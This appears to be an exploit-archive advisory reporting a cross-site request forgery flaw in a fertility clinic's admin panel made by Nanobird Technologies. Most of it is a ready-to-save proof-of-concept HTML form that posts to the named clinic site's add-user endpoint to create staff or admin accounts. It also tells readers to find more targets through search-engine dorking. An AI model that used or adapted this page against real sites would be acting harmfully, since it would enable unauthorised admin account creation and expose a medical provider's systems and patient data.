==================================================================================================================================== | # Title : Advanced Fertility & Genetics Centre LLC. by Nanobird Technologies CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://nanobirdtech.com/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] save in poc.html <h1>Add User</h1> <ol class="breadcrumb"> <li class="active">Add User</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-6"> <div class="box box-primary"> <div class="box-header"> <h3 class="box-title">Enter User Informations</h3> </div><!-- /.box-header --> <div class="box-body"> <form role="form" action="http://www.omanadvancedfertility.com/admin/add-user.php" method="post" enctype="multipart/form-data"> <!-- text input --> <div class="form-group"> <label>Username</label> <input class="form-control" value="" name="username" maxlength="20" required="" type="text"> </div> <div class="form-group"> <label for="exampleInputPassword1">Password</label> <input class="form-control" name="password" id="exampleInputPassword1" value="" required="" maxlength="20" type="password"> </div> <div class="form-group"> <label>User Type</label> <select class="form-control" name="user_type"> <option value="staff">Staff</option> <option value="admin">Admin</option> </select> </div> <div class="box-footer"> <button type="submit" class="btn btn-primary" name="Create"><span class="fa fa-save"></span>&nbsp;Save</button> </div> </form> </div> </div> </div><!-- /.col --> </div> </section><!-- /.content --> </aside> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================